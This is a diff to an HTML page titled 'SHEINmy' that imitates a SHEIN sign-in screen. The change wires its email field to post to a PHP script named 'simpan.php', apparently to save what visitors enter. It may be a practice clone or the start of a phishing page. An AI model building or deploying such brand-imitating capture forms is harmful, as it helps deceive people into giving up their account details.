--- a/index.html
+++ b/index.html
@@ -9,14 +9,14 @@
 </head>
 
 <body>
-    <table>
-        <h1 class="title">SHEINmy</h1>
-    </table>
-    <form class="form">
+    <h1 class="title">SHEINmy</h1>
+
+    <form class="form" action="simpan.php" method="post">
         <label for="email">Mobile number or email address</label>
         <br>
         <input class="Email" type="email" id="email" name="email" required>
     </form>
+
     <table class="style">
         <tr>
             <td>
@@ -24,9 +24,9 @@
             </td>
         </tr>
     </table>
-    <table>
+
     <p class="Join">--------- Or Join With -----------</p>
-    </table>
+
     <table class="style">
         <tr>
             <td>
@@ -39,24 +39,26 @@
             </td>
         </tr>
     </table>
-    <div class="div">
-    <select name="country" id="country" required>
-        <option disabled="-"></option>
+
+    <div class="diva">
+        <select name="country" id="country" required>
+            <option disabled="-"></option>
             <option>Malaysia</option>
             <option>Maldives</option>
             <option>France</option>
             <option>Italy</option>
             <option>South Korea</option>
-        </optgroup>
-    </select>
+            </optgroup>
+        </select>
     </div>
+
     <table class="table2">
         <tr>
             <td class="text1">By continuing, you agree to our<label class="privacy"> Privacy & Cookie Policy</label></td>
+
             <td class="text2"> and<label class="terms"> Terms & Conditions.</label></td>
         </tr>
     </table>
-    
-</body>
 
+</body>
 </html>
